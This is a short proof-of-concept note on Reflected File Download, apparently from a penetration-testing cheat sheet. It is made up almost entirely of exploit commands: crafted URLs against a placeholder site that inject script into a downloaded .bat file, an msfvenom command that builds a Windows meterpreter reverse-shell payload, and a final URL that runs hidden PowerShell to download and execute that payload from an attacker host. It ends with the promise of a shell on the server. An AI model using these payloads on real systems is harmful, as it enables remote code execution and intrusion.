Reflected File Download (RFD)
POC
Here are some of the commands you can try to exploit this vulnerability:
https://www.vulnerable-website.com/api/some-path;/setup.bat;/setup.bat?callback=rfd\"||calc||
https://www.vulnerable-website.com/api/some-path;/setup.bat;/setup.bat?callback=WSH.Echo('Hello World’);
https://www.vulnerable-website.com/api/some-path;/setup.bat;/setup.bat?callback=WSH.Echo('Hello World’);var command = “Calc.exe”;var WshShell = WScript.CreateObject(“WScript.Shell”);WshShell.Run(command);
Create meterpreter payload msfvenom -p windows/x64/meterpreterreversetcp LHOST=attackerip LPORT=4444 -f psh -o meterpreter-payload.txt
https://www.vulnerable-website.com/api/some-path;/setup.bat;/setup.bat?callback=WSH.Echo('Hello World’);var command = “powershell -ep bypass -NoExit -w hidden IEX (New-Object System.Net.Webclient).DownloadString(‘http://attackerip:8080/meterpreter-payload.txt')”;var WshShell = WScript.CreateObject(“WScript.Shell”);WshShell.Run(command);
You’ll get a shell on the server
Impact
Very High (when a shell session obtained)
Likelihood
Very High (when a shell session obtained)